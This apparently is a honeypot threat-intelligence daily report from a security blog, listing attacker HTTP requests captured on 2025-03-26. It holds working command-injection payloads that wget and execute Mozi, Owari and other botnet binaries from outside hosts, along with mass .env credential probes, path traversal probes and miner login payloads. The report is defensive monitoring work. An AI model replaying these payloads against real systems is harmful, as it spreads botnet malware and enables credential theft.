Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-03-26

·2766 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-03-26
#

interaction report on http service of various Hhoneypot around the world.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
CNSingapore
FRSingapore
FRAustralia
FRDubai
USDubai
FRGeorgia
US
US
US
US
US
US
US
US
US

botnet_dropper_behaviour
#

list of requests with dropper behavior (command execution and implant upload attempts) n

remote_addrrequest
103.48.66.17927;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
182.120.63.233GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://182.120.63.233:40625/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
103.42.243.427;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
185.196.220.57GET /shell?cd+/tmp;rm+-rf+x86;nohup+wget+http:/\x5C/network-for.ocean-network.cloud/bins/g4za.x86;chmod+777+g4za.x86;./g4za.x86;nohup+wget+http:/\x5C/network-for.ocean-network.cloud/bins/g4za.arm7;chmod+777+g4za.arm7;./g4za.arm7;nohup+wget+http:/\x5C/network-for.ocean-network.cloud/bins/g4za.arm6;chmod+777+g4za.arm6;./g4za.arm6;ulimit+-n+99999 HTTP/1.1
58.146.59.84GET /shell?cd+/tmp;rm+-rf+*;wget+ http://200.129.143.6/Binarys/Owari.arm;chmod+777+/tmp/Owari.arm;sh+/tmp/Owari.arm arm4.jaws HTTP/1.1
122.97.138.13627;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
87.121.84.195POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1
87.121.84.41POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1
185.196.220.57GET /shell?cd+/tmp;rm+-rf+x86;nohup+wget+http:/\x5C/network-for.ocean-network.cloud/bins/g4za.x86;chmod+777+g4za.x86;./g4za.x86;nohup+wget+http:/\x5C/network-for.ocean-network.cloud/bins/g4za.arm7;chmod+777+g4za.arm7;./g4za.arm7;ulimit+-n+99999 HTTP/1.1
217.160.89.196GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://45.137.70.156/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
118.40.165.223GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://185.225.75.8/bins/vcimanagement.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
103.159.96.179GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.159.96.179:60511/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
47.121.133.117GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
45.230.66.56GET /shell?cd+/tmp;rm+-rf+*;wget+http://45.230.66.56:10695/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1556GET /config/app/.env HTTP/1.1
2544GET /config/auth/.env HTTP/1.1
2554GET /config/security/.env HTTP/1.1
2574GET /config/mail/.env HTTP/1.1
2644GET /webmaster/.env HTTP/1.1
2744GET /services/.env HTTP/1.1
3744GET /account/.env HTTP/1.1
3754GET /config/system/.env HTTP/1.1
3804GET /register/.env HTTP/1.1
3834GET /vendors/.env HTTP/1.1
4023HEAD /vendor/cakephp/debug_kit/ HTTP/1.1
4033HEAD /tmp/logs/query.log HTTP/1.1
4043HEAD /debug-kit/panels/environment HTTP/1.1
4053HEAD /debug-kit/history/view/{id} HTTP/1.1
4063HEAD /cake_debug HTTP/1.1
4073HEAD /debug-kit/toolbar/clear HTTP/1.1
4083HEAD /debug-kit/panels HTTP/1.1
4123HEAD /tmp/logs/error.log HTTP/1.1
4133HEAD /tmp/debug_kit.sqlite HTTP/1.1
4143HEAD /tmp/logs/debug.log HTTP/1.1
4153HEAD /debug-kit/ HTTP/1.1
4163HEAD /debug-kit/history HTTP/1.1
4173HEAD /src/Middleware/DebugKitMiddleware.php HTTP/1.1
4293HEAD /config/bootstrap.php HTTP/1.1
4383HEAD /debug-kit/panels/history HTTP/1.1
4393HEAD /debug-kit/toolbar HTTP/1.1
4403HEAD /debug-kit/panels/sql_log HTTP/1.1
4423HEAD /debug-kit/panels/view HTTP/1.1
4452GET /cassandra/.env HTTP/1.1
4462GET /ssh/private/.env HTTP/1.1
4472GET /gcp-keys/.env HTTP/1.1
4482GET /azure-keys/.env HTTP/1.1
4492GET /keys/.env HTTP/1.1
4502GET /solr/.env HTTP/1.1
4512GET /elasticsearch/.env HTTP/1.1
4522GET /memcached/.env HTTP/1.1
4532GET /redis/.env HTTP/1.1
4542GET /mongodb/.env HTTP/1.1
4552GET /mongo/.env HTTP/1.1
4562GET /key/.env HTTP/1.1
4572GET /private-key/.env HTTP/1.1
4582GET /public-key/.env HTTP/1.1
4592GET /ssh/.env HTTP/1.1
4602GET /ssh/config/.env HTTP/1.1
4612GET /ssh/keys/.env HTTP/1.1
4622GET /mariadb/.env HTTP/1.1
4632GET /ssh/public/.env HTTP/1.1
4642GET /aws-keys/.env HTTP/1.1
4652GET /mysql/.env HTTP/1.1
4672GET /postgresql/.env HTTP/1.1
4682GET /id_rsa/.env HTTP/1.1
4692GET /queue/.env HTTP/1.1
4702GET /tasks/.env HTTP/1.1
4712GET /task/.env HTTP/1.1
4722GET /scheduled/.env HTTP/1.1
4732GET /crontab/.env HTTP/1.1
4742GET /scheduler/.env HTTP/1.1
4752GET /schedule/.env HTTP/1.1
4762GET /sphinx/.env HTTP/1.1
4772GET /jobs/.env HTTP/1.1
4782GET /processing/.env HTTP/1.1
4792GET /process/.env HTTP/1.1
4802GET /event/.env HTTP/1.1
4812GET /events/.env HTTP/1.1
4822GET /logger/.env HTTP/1.1
4832GET /log/.env HTTP/1.1
4842GET /marketing/.env HTTP/1.1
4852GET /job/.env HTTP/1.1
4862GET /azure-config/.env HTTP/1.1
4872GET /gcp-config/.env HTTP/1.1
4882GET /aws-config/.env HTTP/1.1
4892GET /azure-credentials/.env HTTP/1.1
4902GET /metrics/.env HTTP/1.1
4912GET /analytics/.env HTTP/1.1
4922GET /statistics/.env HTTP/1.1
4942GET /id_dsa/.env HTTP/1.1
4952GET /report/.env HTTP/1.1
4962GET /media/uploads/.env HTTP/1.1
4982GET /file/.env HTTP/1.1
5002GET /certs/.env HTTP/1.1
5012GET /cert/.env HTTP/1.1
5022GET /known_hosts/.env HTTP/1.1
5032GET /authorized_keys/.env HTTP/1.1
5042GET /reports/.env HTTP/1.1
5052GET /bitbucket/.env HTTP/1.1
5062GET /github/.env HTTP/1.1
5072GET /gitlab/.env HTTP/1.1
5082GET /jenkins/.env HTTP/1.1
5092GET /builder/.env HTTP/1.1
5102GET /ci/.env HTTP/1.1
5112GET /qa/.env HTTP/1.1
5122GET /stg/.env HTTP/1.1
5132GET /telemetry/.env HTTP/1.1
5162GET /usr/share/.env HTTP/1.1
5182GET /var/www/html/.env HTTP/1.1
5192GET /var/www/.env HTTP/1.1
5202GET /etc/config/.env HTTP/1.1
5232GET /app/ssl/.env HTTP/1.1
5242GET /ssl/certs/.env HTTP/1.1
5252GET /certificates/.env HTTP/1.1
5262GET /certificate/.env HTTP/1.1
5272GET /ssl/.env HTTP/1.1
5282GET /.aws/.env HTTP/1.1
5292GET /secret/credentials/.env HTTP/1.1
5302GET /app/credentials/.env HTTP/1.1
5312GET /git/.env HTTP/1.1
5322GET /credentials/.env HTTP/1.1
5332GET /creds/.env HTTP/1.1
5342GET /usr/bin/.env HTTP/1.1
5352GET /sbin/.env HTTP/1.1
5392GET /.git/.env HTTP/1.1
5402GET /config/credentials/.env HTTP/1.1
5412GET /db_backup/.env HTTP/1.1
5422GET /backup/archives/.env HTTP/1.1
5432GET /archives/.env HTTP/1.1
5442GET /archive/.env HTTP/1.1
5452GET /backup/.env.bak HTTP/1.1
5462GET /bak/.env HTTP/1.1
5482GET /legacy/.env HTTP/1.1
5492GET /usr/local/.env HTTP/1.1
5502GET /member/.env HTTP/1.1
5522GET /accounts/.env HTTP/1.1
5532GET /usr/local/share/.env HTTP/1.1
5542GET /gcp-credentials/.env HTTP/1.1
5552GET /aws-credentials/.env HTTP/1.1
5562GET /dynamodb/.env HTTP/1.1
5572GET /couchdb/.env HTTP/1.1
5582GET /members/.env HTTP/1.1
5602GET /config/services/.env HTTP/1.1
5612GET /config/session/.env HTTP/1.1
5622GET /config/queue/.env HTTP/1.1
5632GET /config/cache/.env HTTP/1.1
5642GET /config/database/.env HTTP/1.1
5652GET /mods/.env HTTP/1.1
5662GET /moderator/.env HTTP/1.1
5672GET /db_backups/.env HTTP/1.1
5692GET /master/.env HTTP/1.1
5702GET /console/.env HTTP/1.1
5712GET /webadmin/.env HTTP/1.1
5722GET /panel/.env HTTP/1.1
5732GET /management/.env HTTP/1.1
5742GET /manage/.env HTTP/1.1
5752GET /database_backups/.env HTTP/1.1
5762GET /database_backup/.env HTTP/1.1
5772GET /supervisor/.env HTTP/1.1
5782GET /compliance/.env HTTP/1.1
5792GET /oauth/.env HTTP/1.1
5802GET /oauth2/.env HTTP/1.1
5812GET /logout/.env HTTP/1.1
5822GET /find/.env HTTP/1.1
5832GET /lookup/.env HTTP/1.1
5842GET /query/.env HTTP/1.1
5852GET /api-doc/.env HTTP/1.1
5862GET /api-docs/.env HTTP/1.1
5872GET /swagger/.env HTTP/1.1
5882GET /apidoc/.env HTTP/1.1
5892GET /docs/api/.env HTTP/1.1
5902GET /documentation/api/.env HTTP/1.1
5912GET /spec/.env HTTP/1.1
5922GET /specs/.env HTTP/1.1
5932GET /secure/certificates/.env HTTP/1.1
5942GET /faq/.env HTTP/1.1
5952GET /contacts/.env HTTP/1.1
5972GET /service-desk/.env HTTP/1.1
5982GET /helpdesk/.env HTTP/1.1
5992GET /help/.env HTTP/1.1
6002GET /tickets/.env HTTP/1.1
6012GET /design/.env HTTP/1.1
6022GET /support/.env HTTP/1.1
6032GET /messaging/.env HTTP/1.1
6042GET /message-board/.env HTTP/1.1
6052GET /chat/.env HTTP/1.1
6072GET /prototype/.env HTTP/1.1
6082GET /mockup/.env HTTP/1.1
6092GET /wireframe/.env HTTP/1.1
6102GET /ticket/.env HTTP/1.1
6112GET /admin-area/.env HTTP/1.1
6122GET /admin-panel/.env HTTP/1.1
6142GET /config/redis/.env HTTP/1.1
6152GET /my-profile/.env HTTP/1.1
6162GET /my-account/.env HTTP/1.1
6172GET /user-profile/.env HTTP/1.1
6182GET /tos/.env HTTP/1.1
6192GET /sign-out/.env HTTP/1.1
6202GET /sign-in/.env HTTP/1.1
6212GET /?class.module.classLoader.resources.context.configFile=http://cvhusd7dueisij80jutgismdccbadizr5.oast.me&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
6222GET /?class.module.classLoader.resources.context.configFile=https://cvhusd7dueisij80jutgx9b9sweewkgeq.oast.me&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
6232POST /api/agent/tabs/agentData HTTP/1.1
6242GET /RestAPI/ImportTechnicians HTTP/1.1
6272GET /signup/.env HTTP/1.1
6282GET /terms/.env HTTP/1.1
6292GET /policy/.env HTTP/1.1
6302GET /privacy/.env HTTP/1.1
6322GET /preferences/.env HTTP/1.1
6332GET /company/.env HTTP/1.1
6342GET /about/.env HTTP/1.1
6352GET /admin-dashboard/.env HTTP/1.1
6362GET /showcase/.env HTTP/1.1
6382GET /sample/.env HTTP/1.1
6392GET /admins/.env HTTP/1.1
6402GET /wp-includes/.env HTTP/1.1
6412GET /wp-config/.env HTTP/1.1
6422GET /cpanel/.env HTTP/1.1
6432GET /control-panel/.env HTTP/1.1
6442GET /portfolio/.env HTTP/1.1
6452GET /shipping/.env HTTP/1.1
6462GET /customer/.env HTTP/1.1
6472GET /customers/.env HTTP/1.1
6482GET /clients/.env HTTP/1.1
6492GET /partner/.env HTTP/1.1
6502GET /partners/.env HTTP/1.1
6512GET /affiliate/.env HTTP/1.1
6522GET /affiliates/.env HTTP/1.1
6532GET /supplier/.env HTTP/1.1
6542GET /suppliers/.env HTTP/1.1
6552GET /payment/.env HTTP/1.1
6562GET /payments/.env HTTP/1.1
6572GET /billing/.env HTTP/1.1
6582GET /invoice/.env HTTP/1.1
6592GET /invoices/.env HTTP/1.1
6602GET /knowledgebase/.env HTTP/1.1
6612GET /subscriptions/.env HTTP/1.1
6622GET /subscription/.env HTTP/1.1
6632GET /newsletter/.env HTTP/1.1
6642GET /mail/config/.env HTTP/1.1
6652GET /postfix/.env HTTP/1.1
6662GET /sendmail/.env HTTP/1.1
6672GET /smtp/.env HTTP/1.1
6682GET /checkout/.env HTTP/1.1
6692GET /notifications/.env HTTP/1.1
6702GET /notification/.env HTTP/1.1
6712GET /messages/.env HTTP/1.1
6722GET /message/.env HTTP/1.1
6732GET /workers/.env HTTP/1.1
6742GET /worker/.env HTTP/1.1
6752GET /queues/.env HTTP/1.1
6762GET /cart/.env HTTP/1.1
6772GET /email/.env HTTP/1.1
6812GET /surveys/.env HTTP/1.1
6822GET /survey/.env HTTP/1.1
6832GET /feedback/.env HTTP/1.1
6842GET /ratings/.env HTTP/1.1
6852GET /orders/.env HTTP/1.1
6862GET /reviews/.env HTTP/1.1
6872GET /review/.env HTTP/1.1
6882GET /tracking/.env HTTP/1.1
6892GET /delivery/.env HTTP/1.1
6902GET /fulfillment/.env HTTP/1.1
6912GET /search/.env HTTP/1.1
6922GET /wiki/.env HTTP/1.1
6932GET /kb/.env HTTP/1.1
6942GET /rating/.env HTTP/1.1
6952GET /order/.env HTTP/1.1
6962GET /warehouse/.env HTTP/1.1
6972GET /stock/.env HTTP/1.1
6982GET /inventory/.env HTTP/1.1
6992GET /merchandise/.env HTTP/1.1
7002GET /product/.env HTTP/1.1
7012GET /catalog/.env HTTP/1.1
7022GET /forum/.env HTTP/1.1
7032GET /sales/.env HTTP/1.1
7042GET /commerce/.env HTTP/1.1
7052GET /e-commerce/.env HTTP/1.1
7062GET /ecommerce/.env HTTP/1.1
7072GET /store/.env HTTP/1.1
7082GET /shop/.env HTTP/1.1
7092GET /comments/.env HTTP/1.1
7102GET /community/.env HTTP/1.1
7112GET /pos/.env HTTP/1.1
7122GET /config/wp-admin/.env HTTP/1.1
7132GET /config/wp-content/.env HTTP/1.1
7142GET /config/wp-config/.env HTTP/1.1
7152GET /config/wp-includes/.env HTTP/1.1
7162GET /config/wordpress/.env HTTP/1.1
7172GET /config/wp/.env HTTP/1.1
7182GET /config/drupal/.env HTTP/1.1
7192GET /config/joomla/.env HTTP/1.1
7202GET /config/magento/.env HTTP/1.1
7212GET /config/opencart/.env HTTP/1.1
7282GET /config/yii/.env HTTP/1.1
7292GET /config/zend/.env HTTP/1.1
7302GET /config/cakephp/.env HTTP/1.1
7312GET /config/codeigniter/.env HTTP/1.1
7322GET /config/laravel/.env HTTP/1.1
7332GET /config/symfony/.env HTTP/1.1
7342GET /config/typo3/.env HTTP/1.1
7362GET /config/sitecore/.env HTTP/1.1
7372GET /config/woocommerce/.env HTTP/1.1
7382GET /config/shopify/.env HTTP/1.1
7392GET /config/prestashop/.env HTTP/1.1
7442GET /config/umbraco/.env HTTP/1.1
7452GET /config/email/.env HTTP/1.1
7462GET /config/marketing/.env HTTP/1.1
7472GET /config/analytics/.env HTTP/1.1
7482GET /config/payment/.env HTTP/1.1
7492GET /config/store/.env HTTP/1.1
7502GET /config/shop/.env HTTP/1.1
7512GET /config/ecommerce/.env HTTP/1.1
7522GET /config/control-panel/.env HTTP/1.1
7532GET /config/cms/.env HTTP/1.1
7542GET /config/framework/.env HTTP/1.1
7552GET /config/platform/.env HTTP/1.1
7562GET /config/desktop/.env HTTP/1.1
7572GET /config/mobile/.env HTTP/1.1
7582GET /config/frontend/.env HTTP/1.1
7592GET /config/backend/.env HTTP/1.1
7602GET /config/web/.env HTTP/1.1
7612GET /config/crm/.env HTTP/1.1
7622GET /config/admin-dashboard/.env HTTP/1.1
7632GET /config/admin-area/.env HTTP/1.1
7642GET /config/admin-panel/.env HTTP/1.1
7652GET /config/cp/.env HTTP/1.1
7662GET /config/console/.env HTTP/1.1
7682\x04\x01\x01\xBB\x8E\xFB’d\x00
7692GET /config/social/.env HTTP/1.1
7702GET /config/dashboard/.env HTTP/1.1
7712GET /config/management/.env HTTP/1.1
7722GET /config/admin/.env HTTP/1.1
7732GET /config/profile/.env HTTP/1.1
7742GET /config/account/.env HTTP/1.1
7752GET /config/user/.env HTTP/1.1
7762GET /config/content/.env HTTP/1.1
7772GET /config/media/.env HTTP/1.1
7782GET /config/panel/.env HTTP/1.1
7792GET /config/docker-compose/.env HTTP/1.1
7802GET /config/puppeteer/.env HTTP/1.1
7812GET /options/.env HTTP/1.1
7822GET /config/selenium/.env HTTP/1.1
7832GET /config/cypress/.env HTTP/1.1
7842GET /config/jasmine/.env HTTP/1.1
7862GET /config/django/.env HTTP/1.1
7882GET /config/karma/.env HTTP/1.1
7892GET /config/chai/.env HTTP/1.1
7902GET /config/mocha/.env HTTP/1.1
7912GET /config/jest/.env HTTP/1.1
7922GET /config/prettier/.env HTTP/1.1
7932GET /config/eslint/.env HTTP/1.1
7942GET /config/typescript/.env HTTP/1.1
7982GET /corporate/.env HTTP/1.1
7992GET /config/protractor/.env HTTP/1.1
8012GET /config/varnish/.env HTTP/1.1
8022GET /config/haproxy/.env HTTP/1.1
8032GET /config/kubernetes/.env HTTP/1.1
8042GET /config/apache/.env HTTP/1.1
8052GET /config/nginx/.env HTTP/1.1
8062GET /config/salt/.env HTTP/1.1
8072GET /config/puppet/.env HTTP/1.1
8082GET /config/chef/.env HTTP/1.1
8092GET /config/ansible/.env HTTP/1.1
8102GET /config/terraform/.env HTTP/1.1
8112GET /config/helm/.env HTTP/1.1
8122GET /config/traefik/.env HTTP/1.1
8132GET /config/knockout/.env HTTP/1.1
8142GET /config/backbone/.env HTTP/1.1
8152GET /config/svelte/.env HTTP/1.1
8162GET /config/nuxt/.env HTTP/1.1
8172GET /config/next/.env HTTP/1.1
8182GET /config/gatsby/.env HTTP/1.1
8192GET /config/meteor/.env HTTP/1.1
8202GET /config/babel/.env HTTP/1.1
8212GET /config/vue/.env HTTP/1.1
8222GET /config/angular/.env HTTP/1.1
8232GET /config/react/.env HTTP/1.1
8242GET /config/express/.env HTTP/1.1
8262GET /config/node/.env HTTP/1.1
8272GET /config/rails/.env HTTP/1.1
8282GET /config/flask/.env HTTP/1.1
8292GET /config/ember/.env HTTP/1.1
8302GET /config/grunt/.env HTTP/1.1
8312GET /config/gulp/.env HTTP/1.1
8322GET /config/webpack/.env HTTP/1.1
8332GET /config/postcss/.env HTTP/1.1
8342GET /config/stylus/.env HTTP/1.1
8352GET /config/less/.env HTTP/1.1
8362GET /config/sass/.env HTTP/1.1
8372GET /config/jquery/.env HTTP/1.1
8432GET /config/tailwind/.env HTTP/1.1
8442GET /config/foundation/.env HTTP/1.1
8452GET /config/bootstrap/.env HTTP/1.1
8462GET /config/bulma/.env HTTP/1.1
8482GET /.env.toml HTTP/1.1
8492GET /.env.ini HTTP/1.1
8512GET /api/v1/.env HTTP/1.1
8522GET /api/v3/.env HTTP/1.1
8542GET /ui/.env HTTP/1.1
8562GET /app/config/env/.env HTTP/1.1
8582GET /dist/.env HTTP/1.1
8602GET /deployment/.env HTTP/1.1
8612GET /deploy/config/.env HTTP/1.1
8622GET /config/api/.env HTTP/1.1
8642GET /projects/.env HTTP/1.1
8692GET /debug/.env HTTP/1.1
8722GET /backups/.env HTTP/1.1
8732GET /aws/.env HTTP/1.1
8742GET /.env.yaml HTTP/1.1
8752GET /.env.yml HTTP/1.1
8802GET /system/config/.env HTTP/1.1
8812GET /sys/.env HTTP/1.1
8822GET /admin/system/.env HTTP/1.1
8832GET /admin/settings/.env HTTP/1.1
8842GET /admin/config/.env HTTP/1.1
8852GET /users/.env HTTP/1.1
8882GET /authentication/.env HTTP/1.1
8892GET /packages/.env HTTP/1.1
8902GET /views/.env HTTP/1.1
8922GET /app/sessions/.env HTTP/1.1
8942GET /app/cache/.env HTTP/1.1
8972GET /app/services/.env HTTP/1.1
9012GET /static/.env HTTP/1.1
9022GET /documentation/.env HTTP/1.1
9042GET /aws/config/.env HTTP/1.1
9052GET /db/.env HTTP/1.1
9062GET /migrations/.env HTTP/1.1
9072GET /default/.env HTTP/1.1
9082GET /modules/.env HTTP/1.1
9102GET /cloud/config/.env HTTP/1.1
9112GET /cloud/.env HTTP/1.1
9122GET /aws/credentials/.env HTTP/1.1
9132GET /database/migrations/.env HTTP/1.1
9142GET /config/testing/.env HTTP/1.1
9152GET /config/stage/.env HTTP/1.1
9162GET /config/prod/.env HTTP/1.1
9172GET /config/dev/.env HTTP/1.1
9182GET /config/test/.env HTTP/1.1
9192GET /config/development/.env HTTP/1.1
9202GET /config/staging/.env HTTP/1.1
9222GET /config/local/.env HTTP/1.1
9232GET /config/global/.env HTTP/1.1
9242GET /config/env/.env HTTP/1.1
9262GET /config/server/.env HTTP/1.1
9272GET /config/config/.env HTTP/1.1
9282GET /.env.beta HTTP/1.1
9292GET /.env.original HTTP/1.1
9302GET /config/production/.env HTTP/1.1
9312GET /config/cloud/.env HTTP/1.1
9322GET /config/azure/.env HTTP/1.1
9332GET /config/gcp/.env HTTP/1.1
9342GET /config/aws/.env HTTP/1.1
9352GET /config/docker/.env HTTP/1.1
9382GET /config/qa/.env HTTP/1.1
9462GET /config/ci/.env HTTP/1.1
9482GET /common/.env HTTP/1.1
9512GET /external/.env HTTP/1.1
9522GET /internal/.env HTTP/1.1
9552GET /.env.secrets HTTP/1.1
9562GET /.env.preview HTTP/1.1
9582GET /.env.conf HTTP/1.1
9592GET /.env.alpha HTTP/1.1
9682GET /.env.copy HTTP/1.1
9782GET /tests/.env HTTP/1.1
9802GET /utility/.env HTTP/1.1
9971GET /css/spacer.gif HTTP/1.1
10081GET http://www.google.com/ HTTP/1.0
10241\x01\x00\x00\xFD\xCE\xFA\x0B\xB0\xA0\x00\x00\x00MMS\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x01\x00\x03\x00\xF0\xF0\xF0\xF0\x0B\x00\x04\x00\x1C\x00\x03\x00N\x00S\x00P\x00l\x00a\x00y\x00e\x00r\x00/\x009\x00.\x000\x00.\x000\x00.\x002\x009\x008\x000\x00;\x00 \x00{\x000\x000\x000\x000\x00A\x00A\x000\x000\x00-\x000\x00A\x000\x000\x00-\x000\x000\x00a\x000\x00-\x00A\x00A\x000\x00A\x00-\x000\x000\x000\x000\x00A\x000\x00A\x00A\x000\x00A\x00A\x000\x00}\x00\x00\x00\xE0m\xDF_
10251\x00Z\x00\x00\x01\x00\x00\x00\x016\x01,\x00\x00\x08\x00\x7F\xFF\x7F\x08\x00\x00\x00\x01\x00 \x00:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x004\xE6\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00(CONNECT_DATA=(COMMAND=version))
10261\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x0F\x00
10281GET /sdk/../../../../../..//etc/vmware/hostd/vmInventory.xml HTTP/1.1
10291GET /sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E//etc/vmware/hostd/vmInventory.xml HTTP/1.1
10301\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\xE0’W\x87F\x87\xA63\x05\x02\x00\x01\x00\x00\xA1\xAA
10371\x00\x00\x00\xA4\xFFSMBr\x00\x00\x00\x00\x08\x01@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x06\x00\x00\x01\x00\x00\x81\x00\x02PC NETWORK PROGRAM 1.0\x00\x02MICROSOFT NETWORKS 1.03\x00\x02MICROSOFT NETWORKS 3.0\x00\x02LANMAN1.0\x00\x02LM1.2X002\x00\x02Samba\x00\x02NT LANMAN 1.0\x00\x02NT LM 0.12\x00
10381\x01default
103910\x0C\x02\x01\x01`\x07\x02\x01\x02\x04\x00\x80\x00
10411TNMP\x04\x00\x00\x00TNME\x00\x00\x04\x00
10421\x03\x00\x00\x0B\x06\xE0\x00\x00\x00\x00\x00
10431DmdT\x00\x00\x00\x17\x00\x00\x00\x01\x00\x00\x00\x00\x11\x11\x00\xFF\x01\xFF\x13
10441:\x00\x00\x00/\x00\x00\x00\x02\x00\x00@\x02\x0F\x00\x01\x00=\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x1F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
10521{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220xd31674af0bc31fdc779c3a2d74fe7ab4f9171edf\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
10531{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x22431y9DykAGzegFf9P3ubbeDGbTeRwoUeKe2WzrSsd81aRcQ84Q5wkhQEmUZXALUMxFe9bvBH4RUsCcZvZKNYvYQG7fMxyrw\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
10571\x00\x00\x00\xE0Z\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x01=K\x00\x00\x01\x01\x04\x08\xA8\xC0\xD8C\xAEC\x95x/\x00admin\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x81\x89\x02\x81\x81\x00\xBC:\xAD\xF5\x05\xAF\x91\x91\xAB@mg\xBA\xD0\xF9F\xC3PN\xF9\x8D\xF3tAb\x9Ds<\x87w\x19\x96E{b\xF0\x82\xF8c9\x93\xC7R\xDB0\xFE\x9D\x9F\xB0\xF99r\xD8OO\x1Ae\xF4\xBF\xA6\xE2\xA4\xFBP\x8E\xD8\xF4$\x1A\xAE\x04\xB2\x05\x89\xD6\x9A\xCB)\x1A_\xCE\xE2K{\x8C
10631\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4K\x93\x0EU\x82l\xDD\xF7\x05\x02\x00\x01\x00\x00\xA1\xAA
10661\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB41[\x0F\xC0\xDB\xAD\xAD\xAA\x05\x02\x00\x01\x00\x00\xA1\xAA
10751\x00\x00\x00\xE0Z\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x01=K\x00\x00\x01\x01\x13\x01\xA8\xC0\xF0 \xFF$E\xFF/\x00admin\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x81\x89\x02\x81\x81\x00\xB6h\xA1\xD0MR\xCB\xF5
10761GET /odinhttpcall1742990704 HTTP/1.1
10771GET /OdinHttpCall1742990704 HTTP/1.1
